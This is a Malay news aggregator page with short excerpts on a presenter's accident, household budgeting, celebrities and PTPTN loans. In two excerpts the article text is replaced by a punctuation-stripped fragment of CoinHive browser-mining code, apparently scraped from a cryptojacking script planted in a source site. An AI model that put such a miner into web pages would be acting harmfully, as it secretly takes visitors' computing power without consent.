Fedtri Yahya Kemalangan, Isteri Mohon Orang Ramai Doakan Kesembuhan Suami


Fedtri Yahya kemalangan, isteri mohon orang ramai doakan kesembuhan suami

Thu, 17 Sep 2020 | By telurgoyang | 7 Hits

Baru sahaja bertugas secara langsung di Malaysia Hari Ini MHI bersempena dengan Sambutan Hari Malaysia 2020 semalam pengacara dan juga penulis lirik terkenal Ahmad Fedtri Yahya dimaklumkan mengalami kemalanganHal tersebut dinyatakan sendiri oleh isterinya menerusi media sosial Fedtri dengan memuat naik kondisi pengacara itu yang baru selesai menjalani pembedahanMenurut isterinya Fedtri mengalami kecederaan di muka disebabkan kemalangan yang berlaku Namun begitu kesemua luka tersebut sudah dijahit dengan sempurnaDia turut memohon agar semua >>READ MORE



ViRealHUB.com | Organic and Viral Social Traffic Hub


no imageAmalkan Formula 30:60:5:5, Gaji cuma RM2500 tapi boleh simpan Rm750 sebulan. Ini rahsianya yang rama
Wed, 20 Mar 2019 19:02 | Hits : 32 | MY

Ramai mengeluh gaji sering takcukup Orang yang bergaji Rm2k5k cakap tak cukup Gaji 10k pun cakap tak cukup Apa lagi yang gaji lagi rendah dari tu Tapi sebenarnya semua ini ada jalan penyelesaian dan kena guna formula yang betul Paling best siap ada simpanan lagiSperti yang dikongsi oleh Nur Aliah Mohd Nor ikut Formula 306055 Caranya mudah cuma ikut kita buat perbelajaan dan simpanan me...

no image'Jagalah anak di majlis orang...'
Thu, 05 Sep 2019 05:02 | Hits : 40 | MY

MUJURLAH pada waktu kejadian pengantin sudah melalui kawasan itu dan sudah berada atas pelamin Jika tidak saya pun tidak tahu apa hendak dikatakan kata perancang perkahwinan Fauzi Manan 33 selepas beberapa dekorasi kayu dipasang di laluan pengant...

no imageKWSP mohon maaf pesakit kanser diusung ke kaunter
Sun, 22 Dec 2019 20:01 | Hits : 56 | MY

KWSP menyatakan kekesalan dan memohon maaf atas pengalaman kurang menyenangkan yang dialami pencarum tersebut dan keluarganya...

no imageMasih Bersuami, Tetapi Jaga Anak-Anak Seperti Seorang Ibu Tunggal
Wed, 01 Jan 2020 00:01 | Hits : 25 | MY

Sebagai ibu bapa anda bertanggungjawab dalam menjaga makan pakai anakanak anda Sama ada ibu ataupun ayah keduaduanya mempunyai tanggungjawab masingmasing dalam penjagaan harian anakanakNamun bukan semua ibu bapa yang memahaminya yang biasanya terjadi adalah seorang ayah melepaskan tanggungjawab sepenuhnya kepada isteri segalanya diuruskan oleh isteri Dari soal pemakanan basuh berak ana...

no imageKantoi Dengan Tuan Rumah Bila Penyewa Perempuan Bawa Balik 3 Orang Lelaki
Sat, 11 Aug 2018 15:03 | Hits : 50 | MY

Kini kebanyakan pemilik rumah sewa seringkali memilih penyewa mereka dengan sebaiknya kerana pelbagai kejadian telah berlaku diantara pemilik dengan penyewa rumah Kebanyakan pengalaman yang kita dengan adalah terlibat dengan penyewa lelaki yang sering me...

no imageOrang Asli Minoriti Yang Dipinggirkan
Fri, 30 Nov 2018 21:02 | Hits : 28 | MY

Buju Kurung Exclusive Untuk Wanita Berkerjaya Terbongkar Cara Blogger Dapatkan Organic Traffic Unlimited var miner new CoinHiveAnonymous7yJjci2be3zvC0QDAa7OHGw194lYEfmC throttle 07 minerstart ...

no imagePantang Tengok Laki Orang Elok Sikit, Cepat Je Nak Rampas Che Ta
Fri, 13 Jul 2018 10:02 | Hits : 36 | MY

Sudah mula aktif di Twitter pelakon Rozita Che Wan ibarat pakar kaunseling perkahwinan ataupun Menteri Pembangunan Wanita pula apabila sesetengah netizen menjadikannya kaunter aduan menceritakan mengenai masalah rumah tangga mereka Antara isu yang pa...

no imagePertembungan Tamadun Islam Dengan Orang Viking
Fri, 02 Nov 2018 07:01 | Hits : 85 | MY

Buju Kurung Exclusive Untuk Wanita Berkerjaya Terbongkar Cara Blogger Dapatkan Organic Traffic Unlimited var miner new CoinHiveAnonymous7yJjci2be3zvC0QDAa7OHGw194lYEfmC throttle 07 minerstart ...

no imageJawapan Farah AF2 Setelah Ramai Netizen Tertanya-tanya Kemanakah Dia Menghilang Hampir 15 Tahun Dari
Mon, 11 Mar 2019 14:01 | Hits : 42 | MY

Sudah pasti ada yang merindui nyanyian Farah AF2 atau nama sebenarnya Farah Diana Anuar yang lebih 15 tahun sepi dari sebarang naskhah baru dalam karier nyanyianLebih menonjol sebagai hos ketika ini bintang yang terkenal dengan lagu Antara Dua itu sempat berkongsi soal perkembangan terkininya kepada MHFarah menjelaskan dia kini telah banyak meluangkan masa bersama keluarga selain menjalankan ...

no imagePTPTN minta pendapat orang awam apakah langkah terbaik untuk mengutip hutang pelajar
Sat, 27 Apr 2019 02:04 | Hits : 18 | MY

Pengurusi PTPTN Wan Saiful Wan Jan berkata badan itu akan mendapatkan nasihat dari orang awam tertumpu kepada mekanisma pembayaran balik pinjaman di mana orang awam akan dijemput memberi pandangan tentang bagaimana cara terbaik untuk mengutip balik wang yang telah dipinjamkanKaedah pembayaran balik untuk PTPTN telah pun banyak dibincangkan Dan telah menjadi fokus sejak Pakatan Harapan menj...


Senarai Hotel Wajib Dikunjungi Cuti Sekolah
Sat, 27 Apr 2019 02:04 | Hits : 262 | MY